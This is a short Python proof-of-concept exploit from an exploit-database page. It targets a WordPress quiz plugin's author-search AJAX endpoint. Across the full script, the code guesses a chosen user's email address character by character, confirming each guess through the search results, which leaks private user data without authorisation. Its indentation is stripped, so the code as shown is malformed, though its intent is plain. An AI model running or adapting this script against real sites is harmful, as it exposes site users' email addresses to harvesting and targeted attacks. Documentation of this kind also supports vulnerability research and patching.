## https://sploitus.com/exploit?id=WPEX-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28
import string
import requests
base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
id_to_find = 1
letter_candidates = string.ascii_lowercase + string.digits + '-_.'
email = '@'
# Find letters after @
while True:
print("current email", email)
for letter in letter_candidates:
query = email + letter
data = requests.get(base_url + query).json()
if id_to_find in [item['id'] for item in data['results']]:
email = query
break
else:
break
# Find letters before @
while True:
print("current email", email)
for letter in letter_candidates:
query = letter + email
data = requests.get(base_url + query).json()
if id_to_find in [item['id'] for item in data['results']]:
email = query
break
else:
break